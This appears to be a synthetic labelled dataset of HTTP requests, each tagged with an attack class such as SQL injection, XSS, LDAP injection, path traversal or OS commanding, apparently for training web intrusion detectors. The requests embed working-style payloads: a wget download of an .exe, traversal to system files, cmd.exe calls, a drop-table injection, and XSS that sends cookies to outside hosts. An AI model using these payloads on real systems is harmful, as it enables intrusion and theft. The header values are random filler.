UA-CPU: x86
UA-Disp: 861,959,8
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 0.7 97.3.176.16
Transfer-Encoding: gzip
Upgrade: hljiT/5.4, axrst/8.8
Warning: 463 52.135.104.34 "le3vso" 
X-Forwarded-For: 240.46.36.222
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35804
Start - Id: 46266
class: PathTransversal
GET /utHililsFhtestsreeS/b03XspassthruRhtaccesl1N/v5uiesritoiTinUt/iSGe/r9wnSJtV7SqVj@ZtJVr/hate4n2n3ookeptges/efaQS.exe?T0=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fit.conf&rLreieeeaiac=88970109 HTTP/1.1
Host: 146.206.108.245:544
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-stale
Client-ip: 117.131.231.99
Cookie: Ooodu1asopy=l9GtjRraaereplaceo deletes dat;uldpzW=one;qyaireim=08870651;euree=eos
Cookie2: $Version="45"
Date: Thu, 03 Feb 05 06:24:04 GMT
ETag: W/"zjbRV5pdy3nxjAnt"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sat, 18 Jul 09 09:43:05 CET
If-Unmodified-Since: Sat, 12 Feb 05 22:45:52 CET
If-Match: "OC.S91f7VOZZ5ai6"
If-None-Match: "KfGa4I33X5fXQmtG"
If-Range: *
Max-Forwards: 2916
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: Digest qop=ctrsh
Range: 723-2
Referer: http://www.wKrdi.com/nnre/roswnrN/u4czle.mp3
TE: gzip,trailers,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/0.0 (compatible; Konqueror/6.8; Win98; u0map; rsbm)
UA-CPU: PowerPC
UA-Disp: 6002,8007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: 9.4 www.Iqtes.jpg:12
Transfer-Encoding: gzip
Upgrade: roeie/1.4
Warning: 687 www.ndt99mt.png:13587 "extsrsgust" "Thu, 14 Feb 08 08:06:55 UTC"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46266
Start - Id: 43487
class: OsCommanding
GET /ua/.19J18Q9D93h.css?cia0tlcA8ait=s1OSrGgQ&hpisej0oi=geljgn+&uc7=r-h&9suc7ocoldd=%5Cn+++++wget+http%3A%2F%2F110.181.111.144%3A78140%2Fnftp.exe&4aiccscrhol=ni5iouha8d&NwnPs=oh&taelhehn=ntlumxtOetaf%2F&doerwiiuttoq8=qiqgltn5uA&Rwo=4nubahyrldAanle3n HTTP/1.1
Host: 51.178.137.75
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 52.237.38.162
Cookie: tehcortl68gltm=ewkuier;nuouplCneynnet= en-iy2kuehS;reesadoav1oozae=rodqeeilcnreeetyr;nnndmeEa8ihern=dOx;reh=aiesroaEgimeprse
Cookie2: $Version="51"
Date: Thu, 19 Aug 04 21:18:21 GMT
ETag: W/"@K4eB7R86idDJqDsd"
Expect: 100-continue
From: oie3rs@dut5nl3e.uk
If-Modified-Since: Mon, 30 Apr 07 24:00:07 GMT
If-Unmodified-Since: Sat, 11 Dec 04 08:15:53 GMT
If-Match: "XrFg0cK19tPtMBrhHyi"
If-None-Match: *
If-Range: *
Max-Forwards: 290
MIME-Version: 0.6
Pragma: sttaot=aia
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: Digest nc=122EbA5A
Range: 4-
Referer: /YIet.css
TE: gzip,trailers,chunked;q=0.9
Trailer: Referer
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 2.9; nt-o9; rv:7.7.9) Gecko/54213480
UA-CPU: Sparc
UA-Disp: 6546,0956,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2941x889
Via: 9.0 www.ucei.jpeg
Transfer-Encoding: deflate
Upgrade: whvq9/8.8, onR/9.0, ohe/5.4
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43487
Start - Id: 41820
class: SqlInjection
GET /tshii/atsdcKoid/anint/uK0/vAeaToai/rlmrpeb/stnIpeidssaef0Reaph0.swf?loE6bbot7t1ne=IlaDG%7E5oaa4n9+d4wheres&eshlnonhtoul=ksaMF4caccess_logneenr3uo&ietc=+%5B0eTaet%7Cl&dwHfEboiaetsd5=0875&ftcaO=iau%26o+t+ilo%29nd&tdtIk=etoee+otTsf+&v.maLgMS2.s=aetrijf5ta&osir=%27%3Bdrop++table++++openonMnQpzH&ndar0hS=orx&bow=119&d5=oFLhD&aru8oue8=%2B%5C+sr&HtNminRao54e=E6satd6&h5PmQ=jOfp4d4tvaL&TtrsY=dcn HTTP/1.1
Host: 51.148.120.131
Connection: avctutu
Accept: audio/x-wav;q=0.6, audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e1-1r;q=0.8, pin-kkewB4;q=0.3, c2tfq-ceunx, mOo-evelt;q=0.0
Cache-Control: no-transform
Client-ip: 200.70.15.74
Cookie: hiae=5;8etgsipEtseAeiu=dnleydsnt jecl3Rmochahomebc
Cookie2: $Version="1"
Date: Mon, 27 Mar 06 09:07:41 UTC
ETag: "F3NzHG9eAT8Ftxhff"
Expect: 0hebgg
From: t9iXwsen@4teno.be
If-Modified-Since: Sat, 04 Mar 06 05:39:39 UTC
If-Unmodified-Since: Wed, 21 Dec 05 18:37:00 GMT
If-Match: *
If-None-Match: "jSVRjxa36cWbqLKJ"
If-Range: Thu, 14 Jul 05 08:17:28 CET
Max-Forwards: 5
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM dlJEMDk5ejNIdWhzd2x0ZXBpeXRkbnRzaWFvczdpdGVtdGxuYmxoYWFxcGloaw==
Authorization: l0xeni hmUagdb=rhoIa
Range: 1-,-175130,8812-321864
Referer: /aeg9/euaHhen/3hurk/e3nz4a/ht354roe.cgi
TE: deflate;q=0.6,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/8.8 (compatible; MSIE 2.6; Windows NT; kgr5ni; zi6a; rWceq)
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: 2.4 www.mhOtIl.jpg, 7.3 www.nrOdyt.jpg
Transfer-Encoding: 7aSW8
Upgrade: jnthhN/3.0, 4TrI/5.5, dn4Tr/7.6, winj/6.3, edst/8.0
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 431124702375
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41820
Start - Id: 38043
class: LdapInjection
GET /ekrN6ant4lzao/osfzshhIhegnhtth/s9FFbY/sP.rn.2M8mgYB4k/45/sumaSccdtill2lm6soe/exn_wZDGCWdGgnX4UxD/tywrdlcpelqrdhid/sOpn5w4veteiHnbt/61sioarnwEi9ee/zriA.dll?Aow=9737&hhelr=t84d&ioan3ndnmwo=573179&ChVlocationrp1=2u4atnhfn2&window.openGfy7F=11945&lrabGxhwh=se0enroRgau&RecMioyyIdoia=+s4%5D&raeio66ud23=HfWDt%29%28%26%28objectClass+++%3D++ni*%29&25group byudUMO4Xtmpboot.ini=esyrsee9gurllE1&s2grahyu4ss7lg=03607&dl6ist5mhx=eatntuhtodmqfo&himsatkIet=system5z%7Cwblanperl&mqmtltgma=10628&ocsc=52748&nsgepdre5htis=3 HTTP/1.1
Host: 253.204.86.61
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2;q=0.0, isiri-3342, koi8;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: wtg5erVq-jhsngs;q=0.8, hasDF-Eyal;q=0.3, sSdg-lAgIdH;q=0.4
Cache-Control: only-if-cached
Client-ip: 184.109.254.161
Cookie: MMn7d=362;pinisewo=hpJxgiAiF;VuUmRphpjGkunionv=xn+ 
Cookie2: $Version="76"
Date: Fri, 25 Aug 06 11:29:48 UTC
ETag: W/"WWuFUIQ_dSG.IRN"
Expect: el5e=GntnhEqt
From: deigiel@Ostrbaef.it
If-Modified-Since: Mon, 26 May 08 04:43:10 CET
If-Unmodified-Since: Sat, 29 Jan 05 06:07:42 GMT
If-Match: "FIyTEpIhW2ABRo5"
If-None-Match: "4tqrvZU3DShp.BS0"
If-Range: "QMRAQjv9PG5j7nUDk"
Max-Forwards: 009
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest qop=auth-int
Range: 6583-,350-4,-7502
Referer: http://edsfilh.be/tsNbar/So5seha.jpeg
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: syRddneev04
UA-CPU: x86
UA-Disp: 119,1491,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: 0.2 23.8.130.55:17
Transfer-Encoding: gzip
Upgrade: sok/2.9, aiedsC/6.4, uph/8.9
Warning: 961 113.136.152.242 "nasatnD5Noznimfy" "Sun, 16 Apr 06 05:05:21 UTC"
X-Forwarded-For: 136.67.166.110
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38043
Start - Id: 41819
class: SqlInjection
GET /hA71K/uo5/hH.UgqPfAVAWEZ/hkdeeism2Reu/nli.swf?qUnioa1hes1rf=esi%3Da&a6sa4e0ieS4el=h8metajz+s-&dsxI=ADue&quP7mxkbetweenKL=thtarone&soso6yfmIhouih=%26+r%5Dnesiec&7BinsertuX5@=eeisiy&nEiaEz0xto4=qwer%27++or+0n_v.Account%3D%27auhfnec%40o2nNr4.com&snyc2iaesr2e=+Ct5ycd%5Dhomeoh%3Cservicesen&3ntutsctneA=mc2-I%27ne&m0eiEpwmor9u=r_gkRWO.&etTs=erhnao7HUaamwgetpstelnet%27tlh&semtohen=dreplacevaaoa0s&ernigalf8sssflt=1439&eiovaunmt3nix4e=jsl75uusr9 HTTP/1.0
Host: 81.123.7.144
Connection: 5NelMr
Accept: */*
Accept-Charset: x-mac-turkish;q=0.9, euc-tw
Accept-Encoding: gzip;q=0.8, gzip;q=0.5, compress;q=0.9, compress
Accept-Language: saihod-eolrdht, akzzwh8-g;q=0.6, ufiE6mt-auIigvl;q=0.8, wpk9pNo4-tHN6;q=0.6
Cache-Control: no-cache
Client-ip: 209.250.197.168
Cookie: 6xmlboot.iniNacceptY=8RRlptUila&t;mKra9re0ers=rroEbhasotEt2hel;nsshsyts=Dr7@yahtaccesaon53nd;wqs0hibeiof=Etr
Cookie2: $Version="1"
Date: Tue, 10 Apr 07 24:33:32 CET
ETag: "F3NzHG9eAT8Ftxhff"
Expect: 100-continue
From: t9iXwsen@4teno.be
If-Modified-Since: Mon, 06 Feb 06 17:50:53 UTC
If-Unmodified-Since: Mon, 14 Nov 05 21:11:09 GMT
If-Match: *
If-None-Match: *
If-Range: "Cm2eSuHoxEwEFcPq"
Max-Forwards: 5
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: foa1 r7de=Pe1tlfeE
Range: 340098-821
Referer: http://xqte8esn.fr/gteseIui/enasl/rwntnrxn.txt
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.8 (Machintosh; U; PPC Mac OS X 1.9; sc-ie; rv:3.9.5) Gecko/11386526
UA-CPU: x86
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: 2.4 www.mhOtIl.jpg, 7.3 www.nrOdyt.jpg
Transfer-Encoding: compress
Upgrade: jnthhN/3.0, 4TrI/5.5, dn4Tr/7.6, winj/6.3, edst/8.0
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 431124702375
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41819
Start - Id: 41273
class: SqlInjection
GET /rqaontm/mA.ox3OXhzvwGDxxw/mochaqvUNep9sc/3M.jpg?gli2oOt=04733179&67l3HtCm53t1=1&iGu8e1te=Oa&ea9ljese=939467&iRsfdt9l9epyi=rHE1Q_J_Vf&ha=formtuxFbdpr&9t27zan=3x&ocf9nantsenhr=in7+yii+T+naccess_logmiIr+T&zius6s5hhwgp=18120237 HTTP/1.1
Host: www.oq5cudUyE.it:9
Connection: close
Accept: audio/x-wav;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 203.172.84.59
Cookie: ue35n=T orup>s oeTl;tgmNnawtI=ed7usP9;so=227912;Mexecand1G7d= 3ryeai[sHd ;bsHgraIntLet=ilelWgomgeoluodoad;d2sSn32fg=select    whv  from    ALL_USERS
Cookie2: $Version="01"
Date: Thu, 10 May 07 02:43:29 CET
ETag: W/"o-Hh0hmT.hxeVMlHMD"
Expect: 100-continue
From: eo7Ttna@e3k5cwi.biz
If-Modified-Since: Wed, 31 Aug 05 07:26:13 GMT
If-Unmodified-Since: Thu, 28 Aug 08 24:38:33 GMT
If-Match: "l@t9OZ-zvcx@kK5U8"
If-None-Match: "haLTw8J4QlObUVgN2."
If-Range: Thu, 29 Jul 04 21:12:14 UTC
Max-Forwards: 848
MIME-Version: 0.7
Pragma: wono=fd0mc
Proxy-Authorization: tne4Es oselie=powntD
Authorization: Basic cmlkZGFhOmxzQmQ=
Range: -5,050699-49322,064735-40
Referer: http://aaaslg8r.ch/Lopeoa/nnnadq2O.gz
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.1 (Windows; U; Win98 9.9; u3-ae; rv:0.5.2) Gecko/55517879
UA-Disp: 189,7567,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8605x333
Via: 6.3 212.134.72.185, 4.3 255.240.38.234, 8.4 119.14.37.205
Transfer-Encoding: gzip
Upgrade: nstget/4.5, oth/2.2
Warning: 898 182.226.132.175:4 "domyntnlr2rg2s" "Wed, 18 Mar 09 18:27:27 CET"
X-Forwarded-For: 26.168.221.221
X-Serial-Number: 48153496221638928684
----: -------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41273
Start - Id: 45333
class: PathTransversal
GET /f.MupsggYR-Uboot.iniO/eZCN.Ncz_xHhv8w/Ozn/q.o4b8pBFw.jkMw/ieGDfqnSFAGLo./bz1nfLY3/pzcI.catGinputXxtmfAu/94YcZK4G0/mmdiysaw/ntz/celrylasuEa/omeey1eo1htfryxtania.shtml?ekwnta=8nwinnt%5Cns%3Foeu9%26h0c&ddahH=fya0ltnaranjad&ZtdkdLimef=2649&ktcYNRup=098&tTnlbbtai=ktor&Tspr9o3niEu=uq--wggVX HTTP/1.0
Host: 214.140.85.138
Connection: close
Accept: image/png
Accept-Charset: iso-10646-ucs-2;q=0.4
Accept-Encoding: *
Accept-Language: prsirs-xnhdsrf;q=0.9, d7-es
Cookie: yaObhvwre=97048;o7REYVgdM=hDeq0an% ;i2jecobdoeoni=..\..\..\..\..\..\..\..\..\WINNT\system.ini
Date: Thu, 07 Jan 10 03:50:55 UTC
If-Unmodified-Since: Mon, 12 Jan 09 04:38:37 CET
If-Match: *
If-None-Match: "58IOQD4kk_958gi"
If-Range: Tue, 22 Nov 05 10:14:37 CET
Max-Forwards: 3
Pragma: hewme='m'
Range: 73-4
Referer: /hnnat/sbaa/r03s0alf/xiTeaC/laef.swf
TE: trailers
User-Agent: b6bm8zBM http://www.xh6h.de
UA-Pixels: 467x156
Via: FTP/3.8 www.bet4m.css:2165, HTTP/5.9 251.100.179.9:02874
Transfer-Encoding: compress
Warning: 348 87.159.133.61 "lDlehaLsex1Cijqulr" 

null

End - Id: 45333
Start - Id: 47238
class: XSS
GET /reviocdk/diHBe0cDBf9SzM84siLT/_Wr9tJ3fCtelnet/mioyefitaolernGE5aS/andxy/eJ-AN3r_.php?sid=o22-JIgcbNt&idnitneliydsW=eIOaopsn&ttpsjturH=%3Ca+++++href++++%3D++%22++++about%3A%3Cs%26%2399%3Bript++++%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.menill.com%2Fcgi-bin%2Fnsndal.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E+%22+%3E&9d7_3wexec=dvi2kotn&insHAriofc8eaa=tomK9pAts0&uyag9rfj=bd&fbsohib=%5C0%26rtb%3F&cbb=9716&enhpozut=ieTV&open.landvz6lZU=ttf7oj&eotwteze=usrlehris&eot=0&ntnt3oo=ek8se HTTP/1.1
Host: 223.4.120.159:2
Connection: keep-alive
Accept: image/*, image/*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.3, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 226.163.167.76
Cookie: r6u=4639566;j0YdzUHM70=3;ioe39=l;i1desrbrmu1o=yhNq =gnSm-t 3between;biGlHnt=t2:
Cookie2: $Version="633"
Date: Fri, 08 Apr 05 07:08:14 UTC
ETag: W/"8ccRUs5lB-P5M33"
Expect: 100-continue
From: ohkuo@theun.net
If-Modified-Since: Thu, 11 Sep 08 10:15:51 UTC
If-Unmodified-Since: Sun, 21 Oct 07 09:54:34 GMT
If-Match: *
If-None-Match: "Z4LV9FHYLJ8Svn8ND"
If-Range: *
Max-Forwards: 1373
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic bWFjaTpEZ2hlTQ==
Authorization: Digest nonce
Range: -040129,-2915,414879-
Referer: http://www.aCse.ch/Oahlusik/estph/njnz/l6se.jpg
TE: gzip;q=0.7,chunked
Trailer: Proxy-Authorization
User-Agent: ze0eaai (bCdlpeei; oQq0kyv)
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: HTTP/7.8 149.51.45.48
Transfer-Encoding: jbtesa
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 230.35.184.69
X-Serial-Number: 81818061997454
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47238
Start - Id: 37134
class: LdapInjection
GET /ih4NJLtirme/suEaienln9ieysrt/9se3er/rUJaK_9mdK3n6U3/vTGgyeall9HF5vbscriptpPW.cfm?eeCri6rohbyiw=8600523&IxQqgqcOd=49701&rishtihOsZsic=%5B&bdlsUipiese=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&eua=ueA HTTP/1.1
Host: 189.246.160.142:8988
Connection: close
Accept: image/*;q=0.2
Accept-Charset: x-mac-korean, us-ascii, euc-tw;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=278
Client-ip: 165.184.227.237
Cookie: foeruiemeanank=32957;-N8RnOgJU=1goOi
Cookie2: $Version="74"
Date: Mon, 24 Apr 06 12:09:13 GMT
ETag: "omsqKnISdrLKr-1_"
Expect: seeuhtcr
From: ke6iat@otEmem.org
If-Modified-Since: Tue, 22 Jul 08 20:27:35 CET
If-Unmodified-Since: Sun, 28 Oct 07 01:40:28 GMT
If-Match: *
If-None-Match: "sW9tBDDa1bTwnwhx"
If-Range: *
Max-Forwards: 759
MIME-Version: 8.7
Pragma: aefnttep=u
Proxy-Authorization: NTLM d2FvU3JvaXRDZGNlSWhlbk9wRWVjdGJlb2hrcmVjZWQ=
Authorization: NTLM ZWN0aGRzbXZhT0E1c2xyZXM4ZGFoc2Vid2d1bmxOZWRMZ2lydDY=
Range: -972338,855782-
Referer: http://eHNO.cz/NQEdN5/pras4s/m8eEfr.avi
TE: trailers,deflate;q=0.3
Trailer: Accept-Language
User-Agent: has8sni (mYnIA7xYo; oPsoHE4Gf)
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: 3.5 www.ibmt0eie.tiff
Transfer-Encoding: compress
Upgrade: oEAO/0.4, NrmE/9.1, 2tirU/3.2, dprdqi/9.1, ejn2sn/3.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 84.40.27.181
X-Serial-Number: 4738976742686812
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37134
Start - Id: 47692
class: XSS
GET /sueannueh4Tff95els/tcGiC0oY-7/saR/uGnNri33QZEe/agrsnaodotaentt/kH0Ioyz2P/nTWUr6nhwM56Z/rn@hqfyU1cSBPOHidv/dt.html?HEn9=Pehgroup+bye6ptaT&OIUjNbQc6TL=eeesowchutn&Dwscriptk=uaaxwsailhi9l&Uc2rmuoxbee=N%28ftphtacces&roifsiieaae=Tit0ttsmn5dd&imumefsimonenVi=%3Cinput+type++%3D%22++image+++%22+++dynsrc%3D++%22+javascript%3A%5Bwindow.open%28%27http%3A%2F%2F78.182.107.39%2Filer.cfm%27%2Bdocument.cookie%29%3B%5D%22++++%3E&unhteshdcrkzc=+&ts5eannIpuni7db=01581839&lgeii4dggmc=m%2Foe%24%5DtEe7y+i6aerb HTTP/1.0
Host: 1.53.66.127:26840
Connection: keep-alive
Accept: text/plain;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 29.159.169.244
Cookie: 7jl=a;c7uJ=44708;una=07856;ra=os'spbt@m2fEam
Cookie2: $Version="676"
Date: Sun, 16 Jul 06 23:59:04 UTC
ETag: W/"3RHIlr@KyXDlBypEK"
Expect: 4tnsbsi=twdiihsS;wiecasfs=deaot5
From: maxEoc8e@ae6eyisrl4.biz
If-Modified-Since: Tue, 20 Apr 04 16:00:42 CET
If-Unmodified-Since: Sun, 25 Feb 07 15:44:21 GMT
If-Match: *
If-None-Match: *
If-Range: "a-ZpQlzTiI8L.Fl3"
Max-Forwards: 4
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: sxorov avcea=rose
Authorization: Basic dDlyeWxyYUg6ZXdvTHQzZQ==
Range: 57-,235-9884,973-85
Referer: /hi5s/pdnciH/gFness/5ioh3o.tiff
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/4.5 (Machintosh; U; Mac OS X 8.0; an-ei; rv:3.0.6) Gecko/28731711
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 934x7117
Via: 9.4 www.ao3itLj.html, FTP/2.7 104.74.153.1:652
Transfer-Encoding: gzip
Upgrade: e33s9E/0.6
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47692
Start - Id: 37814
class: LdapInjection
GET /ow8VFbKB7Pt3jTtAT/ymhyuWFfNrxs2eItoDL/5NlogshutdowndocumentKSvvku/nt3.exe?sztlupsv=Ryd%29%28+%7C%28disn%3D*%29 HTTP/1.1
Host: www.u9esmksist.de
Connection: close
Accept: audio/*, image/*
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.0, gzip
Accept-Language: ohr-oe, tss-ewriaod4;q=0.0, r-trT3eoqo;q=0.5
Cache-Control: no-transform
Client-ip: 76.169.84.54
Cookie: uogtr5dh1c=0Bwghmo4I;an3=r;pfrn=523;ae29T13B5nslu=rIoe
Cookie2: $Version="09"
Date: Sun, 25 Oct 09 13:26:22 GMT
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: 100-continue
From: inAltlp8@n6nlbheD8q.it
If-Modified-Since: Tue, 21 Dec 04 01:40:49 CET
If-Unmodified-Since: Thu, 19 Aug 04 03:33:24 CET
If-Match: *
If-None-Match: "qdSIMPkMcHTsIBu"
If-Range: *
Max-Forwards: 73
MIME-Version: 0.8
Pragma: C0=n7dsDnm
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Digest algorithm=MD5
Range: 3012-675
Referer: /iah3.css
TE: deflate;q=0.2,chunked
Trailer: Pragma
User-Agent: Mozilla/4.3 (Windows; U; WinNT 5.7; ot-9a; rv:9.1.3) Gecko/74339588
UA-CPU: x86
UA-Disp: 3820,0444,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 1.1 www.lineeNg.htm, 2.6 www.ieeznco.js:7
Transfer-Encoding: gzip
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 66.215.97.109
X-Serial-Number: 9737658238850824210
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37814
Start - Id: 44289
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.1
Host: www.m7rntcdce.de:66840
Connection: Hbanoal
Accept: application/*;q=0.6, text/*;q=0.3, application/postscript;q=0.6
Accept-Charset: iso-8859-6;q=0.4, macintosh, x-mac-greek
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=44540
Client-ip: 171.2.10.60
Cookie: psc=tm;lunionWkAVku7.=668483
Cookie2: $Version="0"
Date: Wed, 30 Mar 05 22:56:50 UTC
ETag: "b_1HVy3bbCtIipID7"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Thu, 21 Dec 06 03:26:43 CET
If-Unmodified-Since: Fri, 15 Oct 04 22:01:25 UTC
If-Match: "yVetv82c4EOuubLZ"
If-None-Match: "sXzhETLzaX4W4CVxSK1S"
If-Range: "iROizBQS@Y28_D1aeg9"
Max-Forwards: 999
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM b1dmc2ZsdHh6cmV0d2F0dDlsYmlkYWhpc2lrcW5kYWFlOHJ1Zw==
Authorization: wnaeh oheL=ooeioN
Range: 77-00,194-
Referer: /biSAel/ssez/glyt.cgi
TE: gzip,chunked;q=0.7,trailers
Trailer: If-Match
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 6.8; ma-hn; rv:4.6.3) Gecko/02298229
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0573x2598
Via: FTP/3.8 www.4iden.png:946, 4.5 www.mie3.tiff, jlawrd/1.2 www.a0eefe.css:9260
Transfer-Encoding: Oserkm; tohe=lu8n
Upgrade: Aers/1.0, riij1i/9.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 11968
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44289
Start - Id: 36467
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.isiovn.net
Connection: 0yuSkt
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.2
Cache-Control: 6nutohas='i1gxrc'
Client-ip: 52.92.115.192
Cookie: vya=s-;raheemotsrd=36;cr=04096358;1Soj1tmpdA3P8=el;Azsroati=sp7i;qi=yoemc
Cookie2: $Version="4"
Date: Thu, 02 Aug 07 15:54:22 CET
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Thu, 13 Nov 08 11:20:36 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Jul 05 06:34:10 GMT
Max-Forwards: 167
MIME-Version: 8.8
Pragma: wdlddr='EhEx'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM d3NlZGVTZWJ0bG1oNzNuZGNjb2VpZDBhc2E2ZXJmMWI4b2NkZGFt
Range: 57-,410056-,436232-1281
Referer: /tshzsl/simte/3esxi/dsnno.php3
TE: trailers,gzip
Trailer: Accept
User-Agent: lTrm/6.4.9.0
UA-CPU: Sparc
UA-Disp: 640,8640,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: 3.4 www.wsi1.gif, 7.9 www.pntpsf.jpeg, 6.9 www.40SUl7wt.jpg
Transfer-Encoding: gzip
Upgrade: fet/9.1, iro/2.9
Warning: 011 www.qtp2.jpeg "qrH18z" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 36467
Start - Id: 36929
class: LdapInjection
POST /lgk9QWyxX11k_I5a3Z/mn/mNl/YUKKDqXincludevV_t/pirt5Tc/uylmx0tnntrYdeg.dll? HTTP/1.1
Content-Length: 332
